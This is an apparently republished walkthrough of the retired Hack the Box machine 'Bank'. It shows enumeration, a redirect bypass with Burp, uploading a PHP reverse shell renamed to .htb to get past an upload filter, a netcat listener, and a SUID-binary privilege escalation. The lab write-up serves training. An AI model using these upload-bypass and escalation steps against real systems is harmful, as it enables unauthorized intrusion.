Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

Hack the Box (HTB) Machines Walkthrough Series ― Bank

0
0

Continuing with our series on the Hack the Box (HTB) machines, this article contains the walkthrough of another HTB machine. This one is named “Bank.”

HTB is an excellent platform that hosts machines belonging to multiple OSes. It also hosts some other challenges as well. Individuals have to solve the puzzle (simple enumeration and pentest) in order to log into the platform so you can download the VPN pack to connect to the machines hosted on the HTB platform.

Note: Only writeups of retired HTB machines are allowed. The machine in this article, known as “Bank,” is retired.

Let’s start with this machine.

1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.

2. The Bank machine IP is 10.10.10.29.

3. We will adopt the same methodology of performing penetration testing. Let’s start with enumeration in order to gain as much information for the machine as possible.

4. Below is the output of the nmap scan. As we can see, there are lot of ports opened on this machine, including port 22, 80 and 53. Note that DNS is listening on TCP port 53, so Zone transfer is also possible.

<<nmap -sC -sV -oA nmap 10.10.10.29 >>


Hack the Box (HTB) Machines Walkthrough Series ― Bank

5. We’ll start with port 80 enumeration. However, it just points to a standard apache page installation. It looks like that for further enumeration on port 80, it needs a hostname. At this point, the hostname had to be guessed for this machine; this turns out to be bank.htb. This follows the standard convention of HTB machines of the format <machinename>.htb.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

6. In order to resolve it, let’s add the entry in /etc/hosts. The screenshot below depicts the same thing.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

7. And it can be seen now. The login page is presented now if port 80 is browsed again.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

8. We tried several things on this login for an early and easy win, but to no avail. So that means we’re going back to enumeration. We can launch dirbuster to find out if more directories exist by following these steps:

Launch dirbuster: <<dirbuster>> URL: http://bank.htb Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt Extension : php Start

9. After this, observe the output of dirbuster. An interesting point to note is that for the page support.php, we have a 302 redirect, but the size is too big.

10. Let’s try to see if we can analyze the support.php page contents before the redirection happens.

11. Start up Burp and enable the server intercept response as shown below.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

12. Let’s browse to the login.php page again. Now that we can control the redirection, we can see that the support.php page has a complete html page served before any redirection happens.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

13. Redirecting the same request to Burp’s responder, we can see the complete request and response for the support.php page.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

14. Opening the loaded html for support.php in the browser presents the page below.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

15. To load this in Firefox, we can install the NoRedirect plugin and add the URL hxxp://bank.htb/login.php so that no automatic redirects happen under this URL.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

16. Now if we browse to the login page, we can see the support.php page, which gives us the ability to upload files.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

17. Before we start exploiting the upload feature, looking into the source code of the page reveals an important configuration, which states that .htb files will be executed as php. This means that we have to upload php files in a .htb wrapper.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

Ethical Hacking Boot Camp ― 93% Exam Pass Rate

18. Following the analysis as described above, we will try to upload the php shell as an .htb file in support.php page. But before we do that, let’s edit the file to point back to the attacking machine IP and port.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

19. After making the required changes to php backdoor , the file is saved as shell.htb and uploaded as shown below.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

20. Before we browse the uploaded file, let’s start a netcat listener on port 1234.

<<nc -nlvp 1234>>

21. Browsing the uploaded file spawns back the shell, as shown below.


Hack the Box (HTB) Machines Walkthrough Series ― Bank

22. The shell is spawned back as www-data, but we are allowed to visit the directory of user “chris,” as shown below. The commands below were used to grab user.txt file.

<< cd chris>

<< ls >>

<< cat user.txt >>
Hack the Box (HTB) Machines Walkthrough Series ― Bank

23. To perform privilege escalation, one of the first things I always check is to find out which binaries which have SUID bit set.

<< find / perm -u=s -type f 2>/dev/null >>


Hack the Box (HTB) Machines Walkthrough Series ― Bank

24. We can see that there is binary under /var/htb/bin/emergency, which is a SUID bit. Browsing to directory and looking into file type and executing it, we can see that the file is 32-bit ELF executable. Upon executing, we are root.

<< cd /var/htb/bin >>

<< ls -l >>

<< file emergency >>

<< ./emergency >>

<< id >>
Hack the Box (HTB) Machines Walkthrough Series ― Bank

25. Since we are root now, we’re browsing to get the root.txt file.

<< cd /root >>

<< ls >>

<< cat root.txt >>
Hack the Box (HTB) Machines Walkthrough Series ― Bank

So this was another machine from the HTB platform. One interesting thing to learn from this machine was how to analyze 302 redirects. Privilege escalation was straightforward.

We will continue this series with more walkthroughs of such machines.


Viewing all articles
Browse latest Browse all 12749